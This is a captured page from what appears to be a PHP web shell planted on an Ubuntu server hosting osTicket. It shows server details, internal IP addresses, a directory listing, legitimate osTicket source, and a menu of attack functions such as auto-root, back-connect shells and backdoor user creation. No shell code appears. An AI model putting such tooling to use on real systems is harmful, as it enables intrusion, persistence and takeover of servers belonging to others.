Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
IT-Ticket /
osTicket-v1.18.2 /
upload /
[ HOME SHELL ]
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
apps
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
kb
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
scp
[ DIR ]
drwxr-xr-x
setup
[ DIR ]
drwxr-xr-x
account.php
5.31
KB
-rw-r--r--
ajax.php
1.88
KB
-rw-r--r--
avatar.php
1.06
KB
-rw-r--r--
bootstrap.php
15.92
KB
-rw-r--r--
captcha.php
611
B
-rw-r--r--
client.inc.php
3
KB
-rw-r--r--
file.php
2.3
KB
-rw-r--r--
index.php
2.28
KB
-rw-r--r--
login.php
5.63
KB
-rw-r--r--
logo.php
925
B
-rw-r--r--
logout.php
732
B
-rw-r--r--
main.inc.php
1.98
KB
-rw-r--r--
manage.php
2.28
KB
-rwxr-xr-x
offline.php
940
B
-rw-r--r--
open.php
3.1
KB
-rw-r--r--
profile.php
1.2
KB
-rw-r--r--
pwreset.php
3.17
KB
-rw-r--r--
secure.inc.php
1.14
KB
-rw-r--r--
tickets.php
5.66
KB
-rw-r--r--
view.php
1.67
KB
-rw-r--r--
web.config
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : file.php
<?php /********************************************************************* file.php File download facilitator for clients Peter Rotich <peter@osticket.com> Jared Hancock <jared@osticket.com> Copyright (c) 2006-2014 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ require('client.inc.php'); require_once(INCLUDE_DIR.'class.file.php'); //Basic checks if (!$_GET['key'] || !$_GET['signature'] || !$_GET['expires'] || !($file = AttachmentFile::lookupByHash($_GET['key'])) ) { Http::response(404, __('Unknown or invalid file')); } // Get the object type the file is attached to $type = ''; $attachment = null; if ($_GET['id'] && ($attachment=$file->attachments->findFirst(array( 'id' => $_GET['id'])))) $type = $attachment->type; // Enforce security settings if enabled. if ($cfg->isAuthRequiredForFiles() // FAQ & Page files allowed without login. && !in_array($type, ['P', 'F']) // Check user login && !$thisuser // Check staff login && !StaffAuthenticationBackend::getUser() ) { // Try and determine if an agent is viewing the page / file if (strpos($_SERVER['HTTP_REFERRER'], ROOT_PATH . 'scp/') !== false) { $_SESSION['_staff']['auth']['dest'] = Http::refresh_url(); Http::redirect(ROOT_PATH.'scp/login.php'); } else { require 'secure.inc.php'; } } // Validate session access hash - we want to make sure the link is FRESH! // and the user has access to the parent ticket!! if ($file->verifySignature($_GET['signature'], $_GET['expires'])) { try { if (($s = @$_GET['s']) && strpos($file->getType(), 'image/') === 0) return $file->display($s); // Download the file.. $filename = $attachment ? $attachment->name : $file->getName(); $disposition = @$_GET['disposition'] ?: false; $file->download($filename, $disposition, @$_GET['expires']); } catch (Exception $ex) { Http::response(500, 'Unable to find that file: '.$ex->getMessage()); } } // else Http::response(404, __('Unknown or invalid file'));
Close
